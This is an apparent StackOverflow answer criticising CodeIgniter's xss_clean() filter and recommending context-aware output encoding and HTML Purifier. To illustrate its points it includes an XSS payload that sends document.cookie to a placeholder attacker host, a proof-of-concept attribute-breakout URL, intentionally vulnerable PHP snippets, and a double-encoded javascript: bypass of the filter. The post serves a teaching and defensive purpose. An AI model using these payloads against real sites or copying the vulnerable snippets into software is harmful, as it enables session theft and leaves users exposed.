CodeIgniter - why use xss_clean
xss_clean() is extensive, and also silly. 90% of this function does nothing to prevent XSS: it looks for the word alert, for example, but not for document.cookie. No hacker is going to use alert in a real exploit; they are going to hijack the cookie with XSS or read a CSRF token to make an XHR.
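For illustration (my own example, not from the CodeIgniter docs), a realistic payload skips alert entirely and ships the victim's cookie to a host the attacker controls; evil.example is a placeholder:
<img src=x onerror="(new Image()).src='http://evil.example/steal?c='+encodeURIComponent(document.cookie)">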
However, running htmlentities() or htmlspecialchars() with it is redundant. A case where xss_clean() fixes the issue but htmlentities($text, ENT_COMPAT, 'UTF-8') fails is the following:
<?php
$var = $_GET['var']; // attacker-controlled input
print "<img src='$var'>";
?>
A simple PoC is:
http://localhost/xss.php?var=http://domain/some_image.gif'%20onload=alert(/xss/)
The trailing quote closes the src attribute, and the payload adds an onload= event handler to the image tag. One method of stopping this form of XSS is htmlspecialchars($var, ENT_QUOTES); xss_clean() will also prevent it in this case.
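For concreteness, here is a patched version of the script above (my own sketch): with ENT_QUOTES, htmlspecialchars() encodes single quotes as well as double quotes, so the payload can no longer break out of the attribute.
<?php
$var = $_GET['var'];
// ENT_QUOTES converts both ' and " so the attacker cannot escape
// the single-quoted src attribute.
print "<img src='" . htmlspecialchars($var, ENT_QUOTES, 'UTF-8') . "'>";
?>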
However, quoting from the xss_clean() documentation:
Nothing is ever 100% foolproof, of course, but I haven't been able to get anything passed the filter.
That being said, XSS is an output problem, not an input problem. For instance, this function cannot take into account that the variable is already within a <script> tag or an event handler, and it doesn't stop DOM-based XSS either. You need to take into consideration how you are using the data in order to choose the best function. Filtering all data on input is bad practice: not only is it insecure, it also corrupts data, which can make comparisons difficult.
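To make the output-context point concrete, here is a sketch of my own where HTML-encoding the input achieves nothing, because the value lands inside a <script> block rather than in HTML:
<?php
// htmlspecialchars() is the right tool for HTML context, but the
// value below is emitted into JavaScript, so it's the wrong tool:
$id = htmlspecialchars($_GET['id'], ENT_QUOTES, 'UTF-8');
print "<script>var id = $id;</script>";
// A request like ?id=0;alert(document.cookie) contains none of the
// characters htmlspecialchars() encodes, and runs as JavaScript.
?>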
I would recommend using http://htmlpurifier.org/ for doing XSS purification. I'm working on extending my CodeIgniter Input class to start leveraging it.
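A minimal standalone invocation looks roughly like this (a sketch of the library's documented default usage, independent of any CodeIgniter integration):
<?php
require_once 'HTMLPurifier.auto.php';

$config   = HTMLPurifier_Config::createDefault();
$purifier = new HTMLPurifier($config);

// Strips scripts, event handlers, javascript: URLs and so on, while
// keeping the 'safe' markup a comment or forum post might need.
$clean_html = $purifier->purify($_POST['comment']);
?>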
In your case, "stricter methods are fine, and lighter-weight". CodeIgniter developers intend xss_clean() for a different use case, "a commenting system or forum that allows 'safe' HTML tags". This isn't clear from the documentation, where xss_clean is shown applied to a username field.
There's another reason never to use xss_clean() that hasn't been highlighted on StackOverflow so far: xss_clean() was broken during 2011 and 2012, and it's impossible to fix completely without a complete redesign, which didn't happen. At the moment, it's still vulnerable to strings like this:
<a href="j&#x41;vascript:alert%252831337%2529">Hello</a>
The current implementation of xss_clean() starts by effectively applying urldecode() and html_entity_decode() to the entire string. This is needed so it can use a naive check for things like "javascript:". In the end, it returns the decoded string.
An attacker can simply encode their exploit twice. It will be decoded once by xss_clean(), and passed as clean. You then have a singly-encoded exploit, ready for execution in the browser.
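You can replay the decode step in isolation to see the effect (a sketch of the pattern, not the actual xss_clean() source):
<?php
$payload = '<a href="j&#x41;vascript:alert%252831337%2529">Hello</a>';

// Mimic the filter's decode pass: one layer of URL decoding plus one
// layer of HTML entity decoding.
$decoded = html_entity_decode(urldecode($payload), ENT_QUOTES, 'UTF-8');

print $decoded;
// <a href="jAvascript:alert%2831337%29">Hello</a>
// This singly-encoded string slipped past the filter's checks (a
// reported, working bypass at the time); the browser percent-decodes
// the javascript: URL once more and runs alert(31337) on click.
?>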
I call these checks "naive" and unfixable because they're largely reliant on regular expressions. HTML is not a regular language; to match what the browser does, you need a more powerful parser, and xss_clean() has nothing of the sort. Maybe it's possible to whitelist a subset of HTML that lexes cleanly with regular expressions, but the current xss_clean() is very much a blacklist.